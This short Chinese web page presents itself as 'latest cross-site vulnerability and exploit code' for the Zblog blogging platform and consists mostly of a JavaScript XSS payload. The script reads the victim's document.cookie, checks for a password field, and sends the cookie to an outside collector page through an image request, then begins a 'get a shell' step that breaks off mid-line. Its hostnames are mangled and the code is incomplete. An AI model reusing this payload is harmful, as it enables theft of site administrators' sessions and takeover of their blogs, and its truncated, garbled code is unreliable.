Zblog最新跨站漏洞及利用代码

网络安全 2021-07-03 10:02www.168986.cn网络安全知识

  Js里可以写shell,添加用户,偷取COOKIE然后模拟出真正的转向

  xmlhttp=poster();

  cookie=document.cookie;

  login=cookie.indexOf(‘password’)==-1?0:1;

  tolocation=’https://.jb51./’;

  //get cookie

  x=new Image();

  x.src=”.dosjj./c.php?c=”+escape(document.cookie);

  //get a shell

  data=”txaContent=

Copyright © 2016-2025 www.168986.cn 狼蚁网络 版权所有 Power by